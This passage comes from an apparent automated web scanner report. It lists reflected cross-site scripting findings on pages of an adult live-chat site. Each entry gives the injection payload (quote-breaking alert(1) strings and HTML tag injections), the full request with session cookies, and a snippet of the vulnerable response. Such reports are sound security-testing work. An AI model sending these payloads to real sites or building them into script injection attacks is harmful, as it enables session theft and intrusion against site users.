X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 23794
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.531. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/nude-chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06eb"><a>2a1bdec8937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:23 GMT
Connection: close
Content-Length: 23647
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.532. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/orgies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44239'-alert(1)-'0a5659e80e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:29 GMT
Connection: close
Content-Length: 49856
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.533. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/orgies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b235"><a>bd631be4c53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/orgies/?4b235"><a>bd631be4c53=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.534. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/pornstars/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2c2"><a>388c8c895ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.535. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/pornstars/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd6ca'-alert(1)-'66a39635b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:42 GMT
Connection: close
Content-Length: 266553
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

4.536. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/role-play/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27f69'-alert(1)-'603afae0b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:44 GMT
Connection: close
Content-Length: 54077
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d
...[SNIP]...

4.537. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/role-play/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43819"><a>7fb20b0957a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/role-play/?43819"><a>7fb20b0957a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.538. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-galleries/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd9ca'-alert(1)-'52f7516f46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 29898
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.539. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-galleries/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34839"><a>e84c423b110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:02 GMT
Connection: close
Content-Length: 29751
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.540. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-photos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71e01'-alert(1)-'ba036a24c83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
